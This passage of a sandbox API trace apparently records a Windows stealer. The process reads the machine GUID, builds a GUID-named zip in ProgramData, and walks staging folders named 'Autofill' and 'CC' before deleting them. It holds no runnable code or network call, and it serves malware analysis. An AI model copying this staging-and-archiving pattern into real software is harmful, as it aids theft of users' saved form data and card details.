0x0 [0115.947] SetLastError (dwErrCode=0x0) [0115.947] GetLastError () returned 0x0 [0115.947] SetLastError (dwErrCode=0x0) [0115.947] GetLastError () returned 0x0 [0115.947] SetLastError (dwErrCode=0x0) [0115.947] GetLastError () returned 0x0 [0115.947] SetLastError (dwErrCode=0x0) [0115.947] GetLastError () returned 0x0 [0115.947] SetLastError (dwErrCode=0x0) [0115.947] GetLastError () returned 0x0 [0115.947] SetLastError (dwErrCode=0x0) [0115.947] GetLastError () returned 0x0 [0115.947] SetLastError (dwErrCode=0x0) [0115.947] GetLastError () returned 0x0 [0115.947] SetLastError (dwErrCode=0x0) [0115.947] GetLastError () returned 0x0 [0115.947] SetLastError (dwErrCode=0x0) [0115.947] GetLastError () returned 0x0 [0115.947] SetLastError (dwErrCode=0x0) [0115.947] GetLastError () returned 0x0 [0115.947] SetLastError (dwErrCode=0x0) [0115.947] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.948] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.948] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.948] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.948] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.948] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.948] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.948] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.948] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.948] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.948] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.948] GetLastError () returned 0x0 [0115.948] SetLastError (dwErrCode=0x0) [0115.949] GetLastError () returned 0x0 [0115.949] SetLastError (dwErrCode=0x0) [0115.949] GetLastError () returned 0x0 [0115.949] SetLastError (dwErrCode=0x0) [0115.949] GetLastError () returned 0x0 [0115.949] SetLastError (dwErrCode=0x0) [0115.949] GetLastError () returned 0x0 [0115.949] SetLastError (dwErrCode=0x0) [0115.953] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19f4d4 | out: phkResult=0x19f4d4*=0x358) returned 0x0 [0115.954] RegQueryValueExA (in: hKey=0x358, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x19f4d8, lpcbData=0x19f4d0*=0xff | out: lpType=0x0, lpData=0x19f4d8*=0x30, lpcbData=0x19f4d0*=0x25) returned 0x0 [0115.954] RegCloseKey (hKey=0x358) returned 0x0 [0115.954] CharToOemA (in: pSrc="03845cb8-7441-4a2f-8c0f-c90408af5778", pDst=0x19f5d8 | out: pDst="03845cb8-7441-4a2f-8c0f-c90408af5778") returned 1 [0115.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970f40 [0115.955] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x47) returned 0x38eb248 [0115.955] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f40 | out: hHeap=0x29a0000) returned 1 [0115.959] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4098) returned 0x38eb988 [0115.959] CreateFileA (lpFileName="03845cb8-7441-4a2f-8c0f-c90408af57783083953543.zip" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\03845cb8-7441-4a2f-8c0f-c90408af57783083953543.zip"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x358 [0116.035] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a68d8 [0116.035] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970f40 [0116.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970f40, cbMultiByte=47, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0116.035] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x5e) returned 0x29a7488 [0116.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970f40, cbMultiByte=47, lpWideCharStr=0x29a7488, cchWideChar=47 | out: lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned 47 [0116.035] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a77c8 [0116.035] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a7488 | out: hHeap=0x29a0000) returned 1 [0116.036] lstrcpyW (in: lpString1=0x19f498, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.036] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\*.*" [0116.036] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\*.*", lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3359c94e, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x36cf0623, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x36cf0623, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743920 [0116.036] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.036] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.036] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\." [0116.036] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.036] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.036] lstrcatW (in: lpString1="\\", lpString2="." | out: lpString1="\\.") returned="\\." [0116.036] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.036] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3359c94e, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x36cf0623, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x36cf0623, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.037] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.037] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.037] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\.." [0116.037] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.037] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.037] lstrcatW (in: lpString1="\\", lpString2=".." | out: lpString1="\\..") returned="\\.." [0116.037] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.037] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.037] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x345fa161, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x345fa161, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x345fa161, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Autofill", cAlternateFileName="")) returned 1 [0116.038] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.038] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.038] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="Autofill" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill" [0116.038] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.038] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.038] lstrcatW (in: lpString1="\\", lpString2="Autofill" | out: lpString1="\\Autofill") returned="\\Autofill" [0116.038] lstrcmpW (lpString1="Autofill", lpString2=".") returned 1 [0116.038] lstrcmpW (lpString1="Autofill", lpString2="..") returned 1 [0116.038] lstrcpyW (in: lpString1=0x19eb18, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill" [0116.038] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\*.*" [0116.038] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\*.*", lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x345fa161, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x345fa161, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x345fa161, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7439a0 [0116.038] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill" [0116.039] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\" [0116.039] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\." [0116.039] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Autofill" | out: lpString1="\\Autofill") returned="\\Autofill" [0116.039] lstrcatW (in: lpString1="\\Autofill", lpString2="\\" | out: lpString1="\\Autofill\\") returned="\\Autofill\\" [0116.039] lstrcatW (in: lpString1="\\Autofill\\", lpString2="." | out: lpString1="\\Autofill\\.") returned="\\Autofill\\." [0116.039] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.039] FindNextFileW (in: hFindFile=0x7439a0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x345fa161, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x345fa161, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x345fa161, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.039] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill" [0116.039] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\" [0116.039] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill\\.." [0116.039] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Autofill" | out: lpString1="\\Autofill") returned="\\Autofill" [0116.039] lstrcatW (in: lpString1="\\Autofill", lpString2="\\" | out: lpString1="\\Autofill\\") returned="\\Autofill\\" [0116.039] lstrcatW (in: lpString1="\\Autofill\\", lpString2=".." | out: lpString1="\\Autofill\\..") returned="\\Autofill\\.." [0116.039] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.039] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.039] FindNextFileW (in: hFindFile=0x7439a0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x345fa161, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x345fa161, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x345fa161, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.039] FindClose (in: hFindFile=0x7439a0 | out: hFindFile=0x7439a0) returned 1 [0116.039] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x3970048 [0116.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0116.040] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x38) returned 0x38ea358 [0116.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill", cchWideChar=56, lpMultiByteStr=0x38ea358, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill", lpUsedDefaultChar=0x0) returned 56 [0116.040] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2858 [0116.040] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea358 | out: hHeap=0x29a0000) returned 1 [0116.040] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.040] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6968 [0116.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a6968, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.040] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6968 | out: hHeap=0x29a0000) returned 1 [0116.040] PathMatchSpecW (pszFile="Autofill", pszSpec="*.*") returned 1 [0116.040] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x3970048 [0116.040] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0116.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0116.040] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x38) returned 0x38ea6d8 [0116.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill", cchWideChar=56, lpMultiByteStr=0x38ea6d8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill", lpUsedDefaultChar=0x0) returned 56 [0116.041] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2bb8 [0116.041] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea6d8 | out: hHeap=0x29a0000) returned 1 [0116.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Autofill", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.041] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa) returned 0x29aac18 [0116.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Autofill", cchWideChar=10, lpMultiByteStr=0x29aac18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Autofill", lpUsedDefaultChar=0x0) returned 10 [0116.041] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0116.041] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\autofill"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.041] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0116.041] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0116.041] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.041] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\autofill")) returned 0 [0116.041] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2858 | out: hHeap=0x29a0000) returned 1 [0116.041] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34781885, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34781885, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34781885, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CC", cAlternateFileName="")) returned 1 [0116.041] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.041] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.041] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="CC" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC" [0116.042] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.042] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.042] lstrcatW (in: lpString1="\\", lpString2="CC" | out: lpString1="\\CC") returned="\\CC" [0116.042] lstrcmpW (lpString1="CC", lpString2=".") returned 1 [0116.042] lstrcmpW (lpString1="CC", lpString2="..") returned 1 [0116.042] lstrcpyW (in: lpString1=0x19eb18, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC" [0116.042] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\*.*" [0116.042] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\*.*", lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34781885, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34781885, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34781885, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743320 [0116.042] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC" [0116.042] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\" [0116.042] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\." [0116.042] lstrcpyW (in: lpString1=0x19e910, lpString2="\\CC" | out: lpString1="\\CC") returned="\\CC" [0116.042] lstrcatW (in: lpString1="\\CC", lpString2="\\" | out: lpString1="\\CC\\") returned="\\CC\\" [0116.042] lstrcatW (in: lpString1="\\CC\\", lpString2="." | out: lpString1="\\CC\\.") returned="\\CC\\." [0116.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.042] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34781885, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34781885, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34781885, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.042] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC" [0116.042] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\" [0116.042] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC\\.." [0116.042] lstrcpyW (in: lpString1=0x19e910, lpString2="\\CC" | out: lpString1="\\CC") returned="\\CC" [0116.042] lstrcatW (in: lpString1="\\CC", lpString2="\\" | out: lpString1="\\CC\\") returned="\\CC\\" [0116.042] lstrcatW (in: lpString1="\\CC\\", 